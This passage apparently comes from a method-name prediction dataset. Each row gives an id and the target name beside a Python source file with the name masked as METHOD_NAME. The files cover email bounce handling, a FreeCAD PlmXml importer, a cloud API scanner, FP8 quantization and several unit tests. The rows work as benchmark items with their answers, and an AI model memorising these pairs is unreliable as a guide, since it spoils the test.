bounced_email=bounced_email,
timestamp=aws_meta.timestamp,
sub_type=aws_meta.sub_type,
).exists()
if not exists:
PermanentBounceMeta.objects.create(
bounced_email=bounced_email,
timestamp=aws_meta.timestamp,
sub_type=aws_meta.sub_type,
headers=aws_meta.headers,
reason=aws_meta.reason,
destination=aws_meta.destination,
)
def record_complaint(aws_meta):
bounced_email, _ = BouncedEmail.objects.update_or_create(
email=aws_meta.email,
)
exists = ComplaintBounceMeta.objects.filter(
bounced_email=bounced_email,
timestamp=aws_meta.timestamp,
).exists()
if not exists:
ComplaintBounceMeta.objects.create(
bounced_email=bounced_email,
timestamp=aws_meta.timestamp,
headers=aws_meta.headers,
feedback_type=aws_meta.main_type,
sub_type=aws_meta.sub_type,
destination=aws_meta.destination,
)
def record_transient_bounce(aws_meta):
exists = TransientBounceEmail.objects.filter(
email=aws_meta.email,
timestamp=aws_meta.timestamp,
).exists()
if not exists:
TransientBounceEmail.objects.create(
email=aws_meta.email,
timestamp=aws_meta.timestamp,
headers=aws_meta.headers,
)
def METHOD_NAME(message_info):
"""
Creates a list of AwsMeta objects from the Message portion of an AWS
SNS Notification message. One per recipient.
:param message_info: (dict) the "Message" portion of an SNS notification
:return: (list) AwsMeta objects
"""
aws_info = []
mail_info = message_info.get('mail', {})
notification_type = message_info.get('notificationType') or message_info.get('eventType')
if notification_type == NotificationType.BOUNCE:
bounce_info = message_info['bounce']
for recipient in bounce_info['bouncedRecipients']:
aws_info.append(AwsMeta(
notification_type=notification_type,
main_type=bounce_info['bounceType'],
sub_type=bounce_info['bounceSubType'],
timestamp=parse_datetime(bounce_info['timestamp']),
email=recipient['emailAddress'],
reason=recipient.get('diagnosticCode'),
headers=mail_info.get('commonHeaders', {}),
destination=mail_info.get('destination', []),
))
elif notification_type == NotificationType.COMPLAINT:
complaint_info = message_info['complaint']
for recipient in complaint_info['complainedRecipients']:
aws_info.append(AwsMeta(
notification_type=notification_type,
main_type=message_info.get('complaintFeedbackType'),
sub_type=complaint_info.get('complaintSubType'),
timestamp=parse_datetime(complaint_info['timestamp']),
email=recipient['emailAddress'],
reason=None,
headers=mail_info.get('commonHeaders', {}),
destination=mail_info.get('destination', []),
))
return aws_info
def get_emails_to_never_bounce():
system_emails = [
settings.SERVER_EMAIL,
settings.DEFAULT_FROM_EMAIL,
settings.SUPPORT_EMAIL,
settings.PROBONO_SUPPORT_EMAIL,
settings.ACCOUNTS_EMAIL,
settings.DATA_EMAIL,
settings.SUBSCRIPTION_CHANGE_EMAIL,
settings.INTERNAL_SUBSCRIPTION_CHANGE_EMAIL,
settings.BILLING_EMAIL,
settings.INVOICING_CONTACT_EMAIL,
settings.GROWTH_EMAIL,
settings.MASTER_LIST_EMAIL,
settings.SALES_EMAIL,
settings.EULA_CHANGE_EMAIL,
settings.PRIVACY_EMAIL,
settings.CONTACT_EMAIL,
settings.FEEDBACK_EMAIL,
settings.SOFT_ASSERT_EMAIL,
settings.DAILY_DEPLOY_EMAIL,
settings.SAAS_OPS_EMAIL,
settings.SAAS_REPORTING_EMAIL,
]
system_emails.extend(settings.BOOKKEEPER_CONTACT_EMAILS)
return [email for email in system_emails if isinstance(email, str)]
def get_bounced_system_emails():
system_emails = get_emails_to_never_bounce()
general_bounces = (
BouncedEmail.objects
.filter(email__in=system_emails)
.values_list('email', flat=True)
)
transient_bounces = (
TransientBounceEmail.objects
.filter(email__in=system_emails)
.values_list('email', flat=True)
)
return list(general_bounces) + list(transient_bounces) |
298,450 | add reference | # PlmXmlParser
#***************************************************************************
#* Copyright (c) 2015 Juergen Riegel <FreeCAD@juergen-riegel.net> *
#* *
#* This file is part of the FreeCAD CAx development system. *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* FreeCAD is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Lesser General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with FreeCAD; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************/
import xml.etree.ElementTree as ET
FreeCAD_On = False
FreeCAD_Doc = None
FreeCAD_ObjList = []
def ParseUserData(element):
res = {}
for i in element.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserData'):
for value in i.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserValue'):
res[value.attrib['title']] = value.attrib['value']
return res
def addPart(partElement):
global FreeCAD_On,FreeCAD_Doc,FreeCAD_ObjList
print("=== Part ======================================================")
name = partElement.attrib['name']
id = partElement.attrib['id']
userData = ParseUserData(partElement)
bound = partElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Bound')
print(bound.attrib['values'])
representation = partElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Representation')
format = representation.attrib['format']
location = representation.attrib['location']
print(id, name, userData, format, location)
if FreeCAD_On:
import FreeCAD,Assembly
print("Create Reference")
partObject =FreeCAD_Doc.addObject("App::Part",id)
FreeCAD_ObjList.append(partObject)
partObject.Label = name
partObject.Meta = userData
def addAssembly(asmElement):
global FreeCAD_On,FreeCAD_Doc,FreeCAD_ObjList
print("=== Assembly ======================================================")
userData = ParseUserData(asmElement)
name = asmElement.attrib['name']
id = asmElement.attrib['id']
instanceRefs = asmElement.attrib['instanceRefs']
userData['instanceRefs'] = instanceRefs
print(id, name, instanceRefs, userData)
if FreeCAD_On:
import FreeCAD,Assembly
print("Create Reference")
admObject =FreeCAD_Doc.addObject("Assembly::Product",id)
FreeCAD_ObjList.append(admObject)
admObject.Label = name
admObject.Meta = userData
def METHOD_NAME(refElement):
global FreeCAD_On,FreeCAD_Doc,FreeCAD_ObjList
print("=== Reference ======================================================")
userData = ParseUserData(refElement)
partRef = refElement.attrib['partRef'][1:]
userData['partRef'] = partRef
id = refElement.attrib['id']
name = refElement.attrib['name']
transform = refElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Transform')
mtrx = [float(i) for i in transform.text.split(' ')]
print(mtrx)
print(id,name,partRef)
if FreeCAD_On:
import FreeCAD,Assembly
print("Create Reference")
refObject =FreeCAD_Doc.addObject("Assembly::ProductRef",id)
FreeCAD_ObjList.append(refObject)
refObject.Label = name
refObject.Meta = userData
def resolveRefs():
global FreeCAD_On,FreeCAD_Doc,FreeCAD_ObjList
print("=== Resolve References ======================================================")
if FreeCAD_On:
for i in FreeCAD_ObjList:
if i.TypeId == 'Assembly::Product':
objectList = []
for l in i.Meta['instanceRefs'].split(' '):
objectList.append(FreeCAD_Doc.getObject(l))
i.Items = objectList
if i.TypeId == 'Assembly::ProductRef':
i.Item = FreeCAD_Doc.getObject(i.Meta['partRef'])
def open(fileName):
"""called when freecad opens an PlmXml file"""
global FreeCAD_On,FreeCAD_Doc
import FreeCAD,os
docname = os.path.splitext(os.path.basename(fileName))[0]
doc = FreeCAD.newDocument(docname)
message='Started with opening of "'+fileName+'" file\n'
FreeCAD.Console.PrintMessage(message)
FreeCAD_Doc = doc
FreeCAD_On = True
parse(fileName)
resolveRefs()
def insert(filename,docname):
"""called when freecad imports an PlmXml file"""
global FreeCAD_On,FreeCAD_Doc
import FreeCAD
FreeCAD.setActiveDocument(docname)
doc=FreeCAD.getDocument(docname)
FreeCAD.Console.PrintMessage('Started import of "'+filename+'" file')
FreeCAD_Doc = doc
FreeCAD_On = True
parse(fileName)
resolveRefs()
def main():
parse('../../../../data/tests/Jt/Engine/2_Cylinder_Engine3.plmxml')
def parse(fileName):
tree = ET.parse(fileName)
root = tree.getroot()
ProductDef = root.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductDef')
res = ParseUserData(ProductDef.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserData'))
InstanceGraph = ProductDef.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}InstanceGraph')
# get all the special elements we can read
Instances = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}Instance')
Parts = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}Part')
ProductInstances = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductInstance')
ProductRevisionViews = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductRevisionView')
instanceTypesSet = set()
for child in InstanceGraph:
instanceTypesSet.add(child.tag)
print("All types below the InstanceGraph:")
for i in instanceTypesSet:
print(i)
print("")
print(len(Instances),'\t{http://www.plmxml.org/Schemas/PLMXMLSchema}Instance')
print(len(Parts),'\t{http://www.plmxml.org/Schemas/PLMXMLSchema}Part')
print(len(ProductInstances),'\t{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductInstance')
print(len(ProductRevisionViews),'\t{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductRevisionView')
# handle all instances
for child in Instances:
METHOD_NAME(child)
#handle the parts and assemblies
for child in Parts:
if 'type' in child.attrib:
if child.attrib['type'] == 'solid' :
addPart(child)
continue
if child.attrib['type'] == 'assembly' :
addAssembly(child)
continue
print("Unknown Part type:",child)
else:
print("not Type in Part", child)
if __name__ == '__main__':
main() |
298,451 | retrieve | # Copyright 2018 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for Enabled APIs."""
import json
from google.cloud.forseti.common.gcp_type.project import Project
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import enabled_apis_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class EnabledApisScanner(base_scanner.BaseScanner):
"""Scanner for enabled APIs."""
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
"""Initialization.
Args:
global_configs (dict): Global configurations.
scanner_configs (dict): Scanner configurations.
service_config (ServiceConfig): Forseti 2.0 service configs
model_name (str): name of the data model
snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
rules (str): Fully-qualified path and filename of the rules file.
"""
super(EnabledApisScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = enabled_apis_rules_engine.EnabledApisRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp)
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
"""Flatten RuleViolations into a dict for each RuleViolation member.
Args:
violations (list): The RuleViolations to flatten.
Yields:
dict: Iterator of RuleViolations as a dict per member.
"""
for violation in violations:
for api in violation.apis:
violation_data = {
'full_name': violation.full_name,
'api_name': api,
}
yield {
'resource_id': violation.resource_id,
'resource_type': violation.resource_type,
'resource_name': violation.resource_name,
'full_name': violation.full_name,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
'violation_data': violation_data,
'resource_data': violation.resource_data
}
def _output_results(self, all_violations):
"""Output results.
Args:
all_violations (list): A list of violations
"""
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, enabled_apis_data):
"""Find violations in the enabled APIs.
Args:
enabled_apis_data (list): enabled APIs data to find violations in.
Returns:
list: A list of all violations
"""
all_violations = []
LOGGER.info('Finding enabled API violations...')
for project, enabled_apis in enabled_apis_data:
violations = self.rules_engine.find_violations(
project, enabled_apis)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def METHOD_NAME(self):
"""Retrieves the data for scanner.
Returns:
list: List of projects' enabled API data.
Raises:
NoDataError: If no enabled APIs are found.
"""
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
enabled_apis_data = []
for apis in data_access.scanner_iter(session, 'enabled_apis'):
enabled_apis = []
for enabled_api in json.loads(apis.data):
if enabled_api.get('config', {}).get('name'):
enabled_apis.append(
enabled_api.get('config').get('name'))
if enabled_apis:
enabled_apis_data.append(
(Project(apis.parent.name,
apis.parent.full_name,
apis.data),
enabled_apis))
if not enabled_apis_data:
LOGGER.warning('No Enabled APIs found.')
return []
return enabled_apis_data
def run(self):
"""Runs the data collection."""
enabled_apis_data = self.METHOD_NAME()
all_violations = self._find_violations(enabled_apis_data)
self._output_results(all_violations) |
298,452 | init minmax | # /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2018-2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" FP8 quantization and supporting range setting functions """
import torch
from aimet_common.defs import QuantScheme
NUM_MANTISSA_BITS = 3
def METHOD_NAME(tensor, tensor_quantizer, per_channel):
"""
Minmax initialization.
"""
tensor = torch.abs(tensor)
if per_channel:
channel = tensor_quantizer.channel_axis
for c in reversed(range(len(tensor.shape))):
if c != channel:
tensor = tensor.max(c)[0]
tensor_quantizer.fp8_maxval = tensor.clone().to(tensor.device)
maxval = tensor
else:
maxval = max(torch.abs(tensor.min()), tensor.max()).to(tensor.device)
return maxval
def mantissa_bits_to_device(tensor):
"""
Ensure NUM_MANTISSA_BITS is copied to the same device as tensor (only once)
"""
global NUM_MANTISSA_BITS # pylint: disable=global-statement
if not isinstance(NUM_MANTISSA_BITS, torch.Tensor):
NUM_MANTISSA_BITS = torch.Tensor([NUM_MANTISSA_BITS]).to(tensor.device)
def init_mse(tensor, tensor_quantizer, per_channel):
"""
MSE initialization. Nearly equivalent to tf_enhanced
"""
channel = tensor_quantizer.channel_axis
if per_channel:
mxs = [torch.max(torch.abs(xc.min()), torch.abs(xc.max())) for xc in tensor.split(1, dim=channel)]
lsp = [torch.linspace(0.1 * mx.item(), 1.2 * mx.item(), 111) for mx in mxs]
# 111 x n_channels (or 1 in case not --per-channel)
linspaces = torch.stack(lsp).to(tensor.device).transpose(0, 1)
else:
mx = torch.max(torch.abs(tensor.min()), torch.abs(tensor.max()))
lsp = [torch.linspace(0.1 * mx.item(), 1.2 * mx.item(), 111)]
# 111 x 1
linspaces = torch.stack(lsp).to(tensor.device).transpose(0, 1)
mses = torch.zeros_like(linspaces)
meandims = list(torch.arange(len(tensor.shape)))
if per_channel:
meandims.remove(channel)
mantissa_bits_to_device(tensor)
for i, maxval in enumerate(linspaces):
xfp = quantize_to_fp8(tensor, maxval, NUM_MANTISSA_BITS, channel)
mse = ((tensor - xfp) ** 2).mean(dim=meandims)
mses[i, :] = mse
best_mse = mses.argmin(0)
maxval = torch.tensor([linspaces[best_mse[i], i] for i in range(linspaces.shape[-1])]).to(tensor.device)
return maxval
def init_percentile(*_):
"""
Percentile range initialization
"""
raise NotImplementedError("Percentile scheme is not supported for FP8")
INIT_MAP = {
QuantScheme.post_training_tf: METHOD_NAME, # minmax
QuantScheme.post_training_tf_enhanced: init_mse, # MSE
QuantScheme.post_training_percentile: init_percentile
}
def fp8_quantizer(tensor, tensor_quantizer, _):
"""
FP8 quantization entry function.
"""
mantissa_bits_to_device(tensor)
if not hasattr(tensor_quantizer, 'fp8_maxval') or tensor_quantizer.fp8_maxval is None:
raise ValueError('tensor_quantizer.fp8_maxval not present or not initialized!')
return quantize_to_fp8(
tensor, tensor_quantizer.fp8_maxval, NUM_MANTISSA_BITS, tensor_quantizer.channel_axis)
def quantize_to_fp8(x_float: torch.Tensor,
maxval: torch.Tensor,
mantissa_bits: torch.Tensor,
per_channel_axis: int = 0,
) -> torch.Tensor:
"""
FP8 quantizer that exploits the fact that FP quantization is just INT quantization with
scales that depend on the input.
"""
# For learning: ensure that the number of mantissa bits is rounded and clamped to
# allowed values. NB: torch.round should be replaced by ste_round_func (not included
# here yet)
# TODO for learning we need this as well:
# mantissa_bits = torch.clamp(torch.round(mantissa_bits), 1, 7)
# Compute exponent bits from the (learned) number of exponent bits. NB: assumes FP8
exponent_bits = 7 - mantissa_bits
# Tensorized per-channel quantization: ensure that maxval has the same number of
# dimensions as x, where the channel that is individually quantized has size C,
# and all other channels have size 1. E.g. for a conv tensor with C output channels,
# maxval will have shape [C, 1, 1, 1]. This allows broadcasting maxval over the
# input tensor in steps below.
if maxval.shape and maxval.shape[0] != 1 and len(maxval.shape) != len(x_float.shape):
new_shape = [1] * len(x_float.shape)
new_shape[per_channel_axis] = -1
maxval = maxval.view(new_shape)
# Math explanation of what happens here:
# Bias is computed from maxval: $B=2^E - \log_2(M) + \log_2(2 - 2^{-M}) - 1$
# This follows from maxval $M=(2 - 2^{-M}) \cdot 2^{2^E-1-B}$.
bias = 2 ** exponent_bits - torch.log2(maxval) + torch.log2(2 - 2 ** (-mantissa_bits)) - 1
# Ensure no values are greater than the maximum value represented by an 8 bit float system
# with M mantissa and E exponent bits. torch.min/torch.max are used to allow gradients to
# flow to maxval
x_clipped = torch.min(torch.max(x_float, -maxval), maxval)
# FP quantization scale is determined per-element, and is computed as
# \log_2 s = \left\lfloor \log_2 |x_c| + B \right\rfloor - M - B
# the addition of bias inside the floor and subtraction outside ensures that a
# tensor scaling $\alpha \neq 1$ is correctly incorporated
log_scales = torch.floor(torch.log2(torch.abs(x_clipped)) + bias).detach()
# This ensures scales are never smaller than the subnormal scale
log_scales = torch.clamp(log_scales, 1.)
# Second step of computing scale $s$
scales = 2. ** (log_scales - mantissa_bits - bias)
# Using the per-element scale we can quantize the clipped input tensor to the FP grid
return torch.round(x_clipped / scales) * scales |
298,453 | test infer model | """
Copyright (c) 2018-2023 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
pytest.importorskip('openvino.inference_engine')
pytest.importorskip('cv2.gapi.ie.params')
pytest.importorskip('openvino.tools.accuracy_checker.launcher.gapi_launcher')
import cv2
import numpy as np
from openvino.tools.accuracy_checker.launcher.launcher import create_launcher
from openvino.tools.accuracy_checker.config import ConfigError
def get_gapi_test_model(models_dir):
config = {
"framework": "g-api",
#"weights": str(models_dir / "SampLeNet.bin"),
"model": models_dir,
"adapter": "classification",
"device": "cpu",
"inputs": [{"name": "data", "type": "INPUT", "shape": "(3, 32, 32)"}],
'outputs': ['fc3']
}
return create_launcher(config)
class TestGAPILauncher:
def test_launcher_creates(self, models_dir):
assert get_gapi_test_model(models_dir).inputs['data'] == (1, 3, 32, 32)
def METHOD_NAME(self, data_dir, models_dir):
test_model = get_gapi_test_model(models_dir)
_, _, h, w = test_model.inputs['data']
img_raw = cv2.imread(str(data_dir / '1.jpg'))
img_resized = cv2.resize(img_raw, (w, h))
res = test_model.predict([{'data': img_resized}], [{}])
assert np.argmax(res[0]['fc3']) == 7
@pytest.mark.usefixtures('mock_path_exists')
class TestOpenCVLauncherConfig:
def test_missed_framework_in_create_gapi_launcher_raises_config_error_exception(self):
config = {
# 'framework': 'g-api',
'model': 'model.xml',
'weights': 'weights.bin',
'device': 'CPU',
'adapter': 'classification',
'inputs': [{'name': 'data', 'type': 'INPUT'}],
'outputs': ['out']
}
with pytest.raises(KeyError):
create_launcher(config)
def test_missed_model_in_create_gapi_launcher_raises_config_error_exception(self):
config = {
'framework': 'g-api',
# 'model': 'model.ocv',
'weights': 'weights.bin',
'device': 'CPU',
'adapter': 'classification',
'inputs': [{'name': 'data', 'type': 'INPUT'}],
'outputs': ['out']
}
with pytest.raises(ConfigError):
create_launcher(config, 'model')
def test_missed_device_in_create_gapi_launcher_raises_config_error_exception(self):
config = {
'framework': 'g-api',
'model': 'model.xml',
'weights': 'weights.bin',
# 'device': 'not_device',
'adapter': 'classification',
'inputs': [{'name': 'data', 'type': 'INPUT'}],
'outputs': ['out']
}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_inputs_in_create_gapi_launcher_raises_config_error_exception(self):
config = {
'framework': 'g-api',
'model': 'model.xml',
'weights': 'weights.bin',
'device': 'CPU',
'backend': 'not_backend',
'adapter': 'classification',
# 'inputs': [{'name': 'data', 'type': 'INPUT'}]
'outputs': ['out']
}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_outputs_in_create_gapi_launcher_raises_config_error_exception(self):
config = {
'framework': 'g-api',
'model': 'model.xml',
'weights': 'weights.bin',
'device': 'CPU',
'backend': 'not_backend',
'adapter': 'classification',
'inputs': [{'name': 'data', 'type': 'INPUT'}]
#'outputs': ['out']
}
with pytest.raises(ConfigError):
create_launcher(config) |
298,454 | test char array | import unittest
from ctypes import *
from ctypes.test import need_symbol
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
def test_getslice_cint(self):
a = (c_int * 100)(*range(1100, 1200))
b = list(range(1100, 1200))
self.assertEqual(a[0:2], b[0:2])
self.assertEqual(a[0:2:], b[0:2:])
self.assertEqual(len(a), len(b))
self.assertEqual(a[5:7], b[5:7])
self.assertEqual(a[5:7:], b[5:7:])
self.assertEqual(a[-1], b[-1])
self.assertEqual(a[:], b[:])
self.assertEqual(a[::], b[::])
self.assertEqual(a[10::-1], b[10::-1])
self.assertEqual(a[30:20:-1], b[30:20:-1])
self.assertEqual(a[:12:6], b[:12:6])
self.assertEqual(a[2:6:4], b[2:6:4])
a[0:5] = range(5, 10)
self.assertEqual(a[0:5], list(range(5, 10)))
self.assertEqual(a[0:5:], list(range(5, 10)))
self.assertEqual(a[4::-1], list(range(9, 4, -1)))
def test_setslice_cint(self):
a = (c_int * 100)(*range(1100, 1200))
b = list(range(1100, 1200))
a[32:47] = list(range(32, 47))
self.assertEqual(a[32:47], list(range(32, 47)))
a[32:47] = range(132, 147)
self.assertEqual(a[32:47:], list(range(132, 147)))
a[46:31:-1] = range(232, 247)
self.assertEqual(a[32:47:1], list(range(246, 231, -1)))
a[32:47] = range(1132, 1147)
self.assertEqual(a[:], b)
a[32:47:7] = range(3)
b[32:47:7] = range(3)
self.assertEqual(a[:], b)
a[33::-3] = range(12)
b[33::-3] = range(12)
self.assertEqual(a[:], b)
from operator import setitem
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setitem, a, slice(0, 5), "abcde")
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setitem, a, slice(0, 5),
["a", "b", "c", "d", "e"])
# TypeError: int expected instead of float instance
self.assertRaises(TypeError, setitem, a, slice(0, 5),
[1, 2, 3, 4, 3.14])
# ValueError: Can only assign sequence of same size
self.assertRaises(ValueError, setitem, a, slice(0, 5), range(32))
def test_char_ptr(self):
s = b"abcdefghijklmnopqrstuvwxyz"
dll = CDLL(_ctypes_test.__file__)
dll.my_strdup.restype = POINTER(c_char)
dll.my_free.restype = None
res = dll.my_strdup(s)
self.assertEqual(res[:len(s)], s)
self.assertEqual(res[:3], s[:3])
self.assertEqual(res[:len(s):], s)
self.assertEqual(res[len(s)-1:-1:-1], s[::-1])
self.assertEqual(res[len(s)-1:5:-7], s[:5:-7])
self.assertEqual(res[0:-1:-1], s[0::-1])
import operator
self.assertRaises(ValueError, operator.getitem,
res, slice(None, None, None))
self.assertRaises(ValueError, operator.getitem,
res, slice(0, None, None))
self.assertRaises(ValueError, operator.getitem,
res, slice(None, 5, -1))
self.assertRaises(ValueError, operator.getitem,
res, slice(-5, None, None))
self.assertRaises(TypeError, operator.setitem,
res, slice(0, 5), "abcde")
dll.my_free(res)
dll.my_strdup.restype = POINTER(c_byte)
res = dll.my_strdup(s)
self.assertEqual(res[:len(s)], list(range(ord("a"), ord("z")+1)))
self.assertEqual(res[:len(s):], list(range(ord("a"), ord("z")+1)))
dll.my_free(res)
def test_char_ptr_with_free(self):
dll = CDLL(_ctypes_test.__file__)
s = b"abcdefghijklmnopqrstuvwxyz"
class allocated_c_char_p(c_char_p):
pass
dll.my_free.restype = None
def errcheck(result, func, args):
retval = result.value
dll.my_free(result)
return retval
dll.my_strdup.restype = allocated_c_char_p
dll.my_strdup.errcheck = errcheck
try:
res = dll.my_strdup(s)
self.assertEqual(res, s)
finally:
del dll.my_strdup.errcheck
def METHOD_NAME(self):
s = b"abcdefghijklmnopqrstuvwxyz\0"
p = (c_char * 27)(*s)
self.assertEqual(p[:], s)
self.assertEqual(p[::], s)
self.assertEqual(p[::-1], s[::-1])
self.assertEqual(p[5::-2], s[5::-2])
self.assertEqual(p[2:5:-3], s[2:5:-3])
@need_symbol('c_wchar')
def test_wchar_ptr(self):
s = "abcdefghijklmnopqrstuvwxyz\0"
dll = CDLL(_ctypes_test.__file__)
dll.my_wcsdup.restype = POINTER(c_wchar)
dll.my_wcsdup.argtypes = POINTER(c_wchar),
dll.my_free.restype = None
res = dll.my_wcsdup(s)
self.assertEqual(res[:len(s)], s)
self.assertEqual(res[:len(s):], s)
self.assertEqual(res[len(s)-1:-1:-1], s[::-1])
self.assertEqual(res[len(s)-1:5:-7], s[:5:-7])
import operator
self.assertRaises(TypeError, operator.setitem,
res, slice(0, 5), "abcde")
dll.my_free(res)
if sizeof(c_wchar) == sizeof(c_short):
dll.my_wcsdup.restype = POINTER(c_short)
elif sizeof(c_wchar) == sizeof(c_int):
dll.my_wcsdup.restype = POINTER(c_int)
elif sizeof(c_wchar) == sizeof(c_long):
dll.my_wcsdup.restype = POINTER(c_long)
else:
self.skipTest('Pointers to c_wchar are not supported')
res = dll.my_wcsdup(s)
tmpl = list(range(ord("a"), ord("z")+1))
self.assertEqual(res[:len(s)-1], tmpl)
self.assertEqual(res[:len(s)-1:], tmpl)
self.assertEqual(res[len(s)-2:-1:-1], tmpl[::-1])
self.assertEqual(res[len(s)-2:5:-7], tmpl[:5:-7])
dll.my_free(res)
################################################################
if __name__ == "__main__":
unittest.main() |
298,455 | test disclosures | import pytest
from asynctest import mock as async_mock
from aries_cloudagent.storage.error import StorageNotFoundError
from ......core.protocol_registry import ProtocolRegistry
from ......messaging.base_handler import HandlerException
from ......messaging.request_context import RequestContext
from ......messaging.responder import MockResponder
from .....didcomm_prefix import DIDCommPrefix
from ...handlers.disclosures_handler import DisclosuresHandler
from ...messages.disclosures import Disclosures
from ...messages.queries import Queries, QueryItem
from ...models.discovery_record import V20DiscoveryExchangeRecord
TEST_MESSAGE_FAMILY = "TEST_FAMILY"
TEST_MESSAGE_TYPE = TEST_MESSAGE_FAMILY + "/MESSAGE"
@pytest.fixture()
def request_context() -> RequestContext:
ctx = RequestContext.test_context()
ctx.connection_ready = True
ctx.connection_record = async_mock.MagicMock(connection_id="test123")
yield ctx
class TestDisclosuresHandler:
@pytest.mark.asyncio
async def METHOD_NAME(self, request_context):
registry = ProtocolRegistry()
registry.register_message_types({TEST_MESSAGE_TYPE: object()})
request_context.injector.bind_instance(ProtocolRegistry, registry)
disclosures = Disclosures(
disclosures=[
{
"id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
"feature-type": "protocol",
"roles": [],
},
{"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
]
)
test_queries = [
QueryItem(
feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
),
QueryItem(feature_type="goal-code", match="aries.*"),
]
queries = Queries(queries=test_queries)
discovery_record = V20DiscoveryExchangeRecord(
connection_id="test123",
thread_id="test123",
queries_msg=queries,
)
disclosures.assign_thread_id("test123")
request_context.message = disclosures
handler = DisclosuresHandler()
mock_responder = MockResponder()
with async_mock.patch.object(
V20DiscoveryExchangeRecord,
"retrieve_by_id",
async_mock.CoroutineMock(return_value=discovery_record),
) as mock_get_rec_thread_id:
await handler.handle(request_context, mock_responder)
assert not mock_responder.messages
@pytest.mark.asyncio
async def test_disclosures_connection_id_no_thid(self, request_context):
registry = ProtocolRegistry()
